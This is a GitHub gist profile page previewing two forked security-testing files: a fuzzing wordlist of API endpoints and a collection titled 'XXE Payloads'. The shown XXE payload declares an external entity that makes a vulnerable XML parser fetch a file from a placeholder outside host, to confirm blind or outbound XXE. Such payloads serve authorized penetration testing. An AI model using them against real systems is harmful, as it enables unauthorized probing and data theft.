Skip to content

Instantly share code, notes, and snippets.

View c0ldb00t3r's full-sized avatar
🎯
Focusing

Rohan Birtia c0ldb00t3r

🎯
Focusing
View GitHub Profile
@c0ldb00t3r
c0ldb00t3r / List of API endpoints & objects
Created November 25, 2019 21:02 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@c0ldb00t3r
c0ldb00t3r / XXE_payloads
Created August 7, 2017 07:36 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>